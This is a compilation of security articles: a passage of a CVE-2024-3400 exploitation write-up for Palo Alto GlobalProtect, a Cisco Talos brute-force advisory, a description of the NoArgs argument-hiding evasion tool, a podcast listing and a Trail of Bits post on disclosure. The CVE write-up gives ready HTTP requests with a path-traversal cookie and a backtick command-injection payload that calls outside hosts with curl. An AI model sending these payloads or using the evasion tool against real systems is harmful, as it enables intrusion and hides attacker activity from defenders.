.rodata:0000000000D73558                 dq offset main__ptr_SessDiskStore_Get
.rodata:0000000000D73560                 dq offset main__ptr_SessDiskStore_New
.rodata:0000000000D73568                 dq offset main__ptr_SessDiskStore_Save

Great. Let’s give main__ptr_SessDiskStore_New a gander. We can quickly see how the session ID is concatenated into a file path unsafely:

    path = s->path;
    store_8e[0].str = (uint8 *)"session_";
    store_8e[0].len = 8LL;
    store_8e[1] = session->ID;
    fmt_24 = runtime_concatstring2(0LL, *(string (*)[2])&store_8e[0].str);
    *((_QWORD *)&v71 + 1) = fmt_24.len;
    if ( *(_DWORD *)&runtime_writeBarrier.enabled )
      runtime_gcWriteBarrier();
    else
      *(_QWORD *)&v71 = fmt_24.str;
    stored.array = (string *)&path;
    stored.len = 2LL;
    stored.cap = 2LL;
    filename = path_filepath_Join(stored);

Later on in the function, we can see that the binary will - somewhat unexpectedly - create the directory tree that it attempts to read the file containing session information from.

      if ( os_IsNotExist(fmta._r2) )
      {
        store_8b = (github_com_gorilla_sessions_Store_0)net_http__ptr_Request_Context(r);
        ctxb = store_8b.tab;
        v52 = runtime_convTstring((string)s->path);
        v6 = (_1_interface_ *)runtime_newobject((runtime__type_0 *)&RTYPE__1_interface_);
        v51 = (interface__0 *)v6;
        (*v6)[0].tab = (void *)&RTYPE_string_0;
        if ( *(_DWORD *)&runtime_writeBarrier.enabled )
          runtime_gcWriteBarrier();
        else
          (*v6)[0].data = v52;
        storee.tab = ctxb;
        storee.data = store_8b.data;
        fmtb.str = (uint8 *)"folder is missing, create folder %s";
        fmtb.len = 35LL;
        fmt_16a.array = v51;
        fmt_16a.len = 1LL;
        fmt_16a.cap = 1LL;
        paloaltonetworks_com_libs_common_Warn(storee, fmtb, fmt_16a);
        err_1 = os_MkdirAll((string)s->path, 0644u);

This is interesting, and clearly we’ve found a ‘bug’ in the true sense of the word - but have we found a real, exploitable vulnerability?

All that this function gives us is the ability to create a directory structure, with a zero-length file at the bottom level.

We don’t have the ability to put anything in this file, so we can’t simply drop a webshells or anything.

We can cause some havoc by accessing various files in /dev - adventurous (reckless?) tests supplied /dev/nvme0n1 as the cookie file, causing the device to rapidly OOM, but verifying that we could read files as the superuser, not as a limited user.

Arbitrary File Write

Unmarshalling the local file via the user input that we control in the SESSID cookie takes place as root, and with read and write privileges. An unintended consequence is that should the requested file not exist, the file system creates a zero-byte file in its place with the filename intact.

We can verify this is the case by writing a file to the webroot of the appliance, in a location we can hit from an unauthenticated perspective, with the following HTTP request (and loaded SESSID cookie value).

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/watchtowr.txt;

When we attempt to then retrieve the file we previously attempted to create with a simple HTTP request, the web server responds with a 403 status code instead of a 404 status code, indicating that the file has been created. It should be noted that the file is created using root privileges, and as such, it is not possible to view its contents. But, who cares—it's a zero-byte file anyway.

This is in line with the analysis provided by various threat intelligence vendors, which gave us confidence that we were on the right track. But what now?

Telemetry Python

As we discussed further above - a fairly important detail within the advisory description explains that only devices which have telemetry enabled are vulnerable to command injection. But, our above SESSID shenanigans are not influenced by telemetry being enabled or disabled, and thus decided to dive further (and have another 5+ RedBulls).

Without getting too gritty with the code just yet, we observed from appliance logs that we had access to, that every so often telemetry functionality was running on a cronjob and ingesting log files within the appliance. This telemetry functionality then fed this data to Palo Alto servers, who were probably observing both threat actors and ourselves playing around (”Hi Palo Alto!”).

Within the logs that we were reviewing, a certain element stood out - the logging of a full shell command, detailing the use of curl to send logs to Palo Alto from a temporary directory:

24-04-16 02:28:05,060 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><SERIAL_NO>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260285&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz --capath /tmp/capath'

We were able to trace this behaviour to the Python file /p2/usr/local/bin/dt_curl on line #518:

if source_ip_str is not None and source_ip_str != "": 
        curl_cmd = "/usr/bin/curl -v -H \\"Content-Type: application/octet-stream\\" -X PUT \\"%s\\" --data-binary @%s --capath %s --interface %s" \\
                     %(signedUrl, fname, capath, source_ip_str)
    else:
        curl_cmd = "/usr/bin/curl -v -H \\"Content-Type: application/octet-stream\\" -X PUT \\"%s\\" --data-binary @%s --capath %s" \\
                     %(signedUrl, fname, capath)
    if dbg:
        logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
    stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)

The string curl_cmd is fed through a custom library pansys which eventually calls pansys.dosys() in /p2/lib64/python3.6/site-packages/pansys/pansys.py line #134:

    def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
        """call shell-command and either return its output or kill it
           if it doesn't normally exit within timeout seconds"""
    
        # Define dosys specific constants here
        PANSYS_POST_SIGKILL_RETRY_COUNT = 5

        # how long to pause between poll-readline-readline cycles
        PANSYS_DOSYS_PAUSE = 0.1

        # Use first_wait if time to complete is lengthy and can be estimated 
        if first_wait == None:
            first_wait = PANSYS_DOSYS_PAUSE

        # restrict the maximum possible dosys timeout
        PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
        # Can support upto 2GB per stream
        out = StringIO()
        err = StringIO()

        try:
            if shell:
                cmd = command
            else:
                cmd = command.split()
        except AttributeError: cmd = command

        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                 stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
        timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)

As those who are gifted with sight can likely see, this command is eventually pushed through subprocess.Popen() . This is a known function for executing commands (..), and naturally becomes dangerous when handling user input - therefore, by default Palo Alto set shell=False within the function definition to inhibit nefarious behaviour/command injection.

Luckily for us, that became completely irrelevant when the function call within dt_curl overwrote this default and set shell=True when calling the function.

Naturally, this began to look like a great place to leverage command injection, and thus, we were left with the challenge of determining whether our ability to create zero-byte files was relevant.

Without trying to trace code too much, we decided to upload a file to a temporary directory utilised by the telemetry functionality (/opt/panlogs/tmp/device_telemetry/minute/) to see if this would be utilised, and reflected within the resulting curl shell command.

Using a simple filename of “hellothere” within the SESSID value of our unauthenticated HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: <Hostname>
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere

As luck would have it, within the device logs, our flag is reflected within the curl shell command:

24-04-16 01:33:03,746 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><serial-no>/2024/04/16/08/33//opt/panlogs/tmp/device_telemetry/minute/hellothere?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713256984&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/**hellothere** --capath /tmp/capath'

At this point, we’re onto something - we have an arbitrary value in the shape of a filename being injected into a shell command. Are we on a path to receive angry tweets again?

We played around within various payloads till we got it right, the trick being that spaces were being truncated at some point in the filename's journey - presumably as spaces aren't usually allowed in cookie values.

To overcome this, we drew on our old-school UNIX knowledge and used the oft-abused shell variable IFS as a substitute for actual spaces. This allowed us to demonstrate control and gain command execution by executing a Curl command that called out to listening infrastructure of our own!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Here is an example SESSID payload:

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;

And the associated log, demonstrating our injected curl command:

24-04-16 02:28:07,091 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><serial-no>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/hellothere226%60curl%24%7BIFS%7Dx1.outboundhost.com%60?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260287&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere226**`curl${IFS}x1.outboundhost.com**` --capath /tmp/capath'

why hello there to you, too!

Proof of Concept

At watchTowr, we no longer publish Proof of Concepts. Why prove something is vulnerable when we can just believe it's so?

Instead, we've decided to do something better - that's right! We're proud to release another detection artefact generator tool, this time in the form of an HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: watchtowr.com
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}where-are-the-sigma-rules.com`;
Content-Type: application/x-www-form-urlencoded
Content-Length: 158

user=watchTowr&portal=watchTowr&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=watchTowr&computer=watchTowr&client-ip=watchTowr&client-ipv6=watchTowr&md5-sum=watchTowr&gwHipReportCheck=watchTowr

As we can see, we inject our command injection payload into the SESSID cookie value - which, when a Palo Alto GlobalProtect appliance has telemetry enabled - is then concatenated into a string and ultimately executed as a shell command.

Something-something-sophistication-levels-only-achievable-by-a-nation-state-something-something.

Conclusion

It’s April. It’s the second time we’ve posted. It’s also the fourth time we’ve written a blog post about an SSLVPN vulnerability in 2024 alone. That's an average of once a month.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)
The Twitter account https://twitter.com/year_progress puts our SSLVPN posts in context

As we said above, we have no doubt that there will be mixed opinions about the release of this analysis - but, patches and mitigations are available from Palo Alto themselves, and we should not be forced to live in a world where only the “bad guys” can figure out if a host is vulnerable, and organisations cannot determine their exposure.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)
It's not like we didn't warn you

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Cisco Talos would like to acknowledge Brandon White of Cisco Talos and Phillip Schafer, Mike Moran, and Becca Lynch of the Duo Security Research team for their research that led to the identification of these attacks.

Cisco Talos is actively monitoring a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies.  

Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below. However, additional services may be impacted by these attacks. 

  • Cisco Secure Firewall VPN 
  • Checkpoint VPN  
  • Fortinet VPN  
  • SonicWall VPN  
  • RD Web Services 
  • Miktrotik 
  • Draytek 
  • Ubiquiti 

The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to:  

  • TOR   
  • VPN Gate  
  • IPIDEA Proxy  
  • BigMama Proxy  
  • Space Proxies  
  • Nexus Proxy  
  • Proxy Rack 

The list provided above is non-exhaustive, as additional services may be utilized by threat actors.  

Due to the significant increase and high volume of traffic, we have added the known associated IP addresses to our blocklist. It is important to note that the source IP addresses for this traffic are likely to change.

Guidance 

As these attacks target a variety of VPN services, mitigations will vary depending on the affected service. For Cisco remote access VPN services, guidance and recommendation can be found in a recent Cisco support blog:  

Best Practices Against Password Spray Attacks Impacting Remote Access VPN Services 

IOCs 

We are including the usernames and passwords used in these attacks in the IOCs for awareness. IP addresses and credentials associated with these attacks can be found in our GitHub repository here

NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected


NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


Default Cmd:


Windows Event Logs:


Using NoArgs:


Windows Event Logs:


Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:


All the arguemnts are hidden dynamically

Process Monitor View:


Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.

Refrences:

  • https://en.wikipedia.org/wiki/Microsoft_Detours
  • https://github.com/microsoft/Detours
  • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
  • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


Working as a CIO and the challenges of endpoint security| Guest Tom Molden

Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operation system!), his transformational position moving from fiscal strategy and implementation into his first time as chief information officer and talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.

0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scop of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium
47:58 - Learn more about Tom Molden
48:34 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

5 reasons to strive for better disclosure processes

By Max Ammann

This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes.

Here are the five bugs:

Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.

In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:

  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE

Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.

Case 1: Undefined behavior in borsh-rs Rust library

The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years.

During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug.

The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.

I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed.

The following code contained the bug that caused undefined behavior:

impl<T> BorshDeserialize for Vec<T>
where
    T: BorshDeserialize,
{
    #[inline]
    fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> {
        let len = u32::deserialize(reader)?;
        if size_of::<T>() == 0 {
            let mut result = Vec::new();
            result.push(T::deserialize(reader)?);

            let p = result.as_mut_ptr();
            unsafe {
                forget(result);
                let len = len as usize;
                let result = Vec::from_raw_parts(p, len, len);
                Ok(result)
            }
        } else {
            // TODO(16): return capacity allocation when we can safely do that.
            let mut result = Vec::with_capacity(hint::cautious::<T>(len));
            for _ in 0..len {
                result.push(T::deserialize(reader)?);
            }
            Ok(result)
        }
    }
}

Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150)

The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable.

The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.

Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI

In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties.

The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing:

https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch

In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort.

Read more about the technical details of this bug in the blog post Billion times emptiness.

Case 3: Missing limit on authentication tag length in Expo

In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.

When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, [email protected], an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.

Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had.

Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext:

/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException {

  byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8);
  byte[] ciphertextBytes = cipher.doFinal(plaintextBytes);
  String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP);

  String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP);
  int authenticationTagLength = gcmSpec.getTLen();

  JSONObject result = new JSONObject()
    .put(CIPHERTEXT_PROPERTY, ciphertext)
    .put(IV_PROPERTY, ivString)
    .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength);

  postEncryptionCallback.run(promise, result);

  return result;
}

Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java)

For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.

An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.

From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.

The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.

The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately.

Case 4: DoS vector in the num-bigint Rust library

In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.

The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear.

But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails.

The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature:

use num_bigint::BigUint;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut buf = Vec::new();
    let _ = std::io::stdin().read_to_end(&mut buf)?;
    let _: BigUint = bincode::deserialize(&buf).unwrap_or_default();
    Ok(())
}

Figure 3: Example deserialization format

It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed.

impl<'de> Visitor<'de> for U32Visitor {
    type Value = BigUint;

    {...omitted for brevity...}

    #[cfg(not(u64_digit))]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        let len = seq.size_hint().unwrap_or(0);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }

    #[cfg(u64_digit)]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        use crate::big_digit::BigDigit;
        use num_integer::Integer;

        let u32_len = seq.size_hint().unwrap_or(0);
        let len = Integer::div_ceil(&u32_len, &2);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }
}

Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108)

We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4.

Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv

The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark.

During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement:

MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path,
                               std::string cryptKey) {
  __android_log_print(ANDROID_LOG_INFO, "RNMMKV",
                      "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)",
                      instanceId.c_str(), path.c_str(), cryptKey.c_str());
  std::string* pathPtr = path.size() > 0 ? &path : nullptr;
  {...omitted for brevity...}

Figure 5: Code that initializes MMKV and also logs the encryption key

Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.

With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install.

This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process.

Takeaways

GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).

The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls.

However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.

Step 1: Add a security policy

Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.

GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root.

We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:

We have multiple channels for receiving reports:

* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to [email protected]

Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.

Step 2: Enable private reporting

Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.

Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require.

After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”:

Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this:

If you want to enable private reporting for your whole organization, then check out this documentation.

A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically.

On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.

This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.

Step 3: Get notifications via webhooks

If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type:

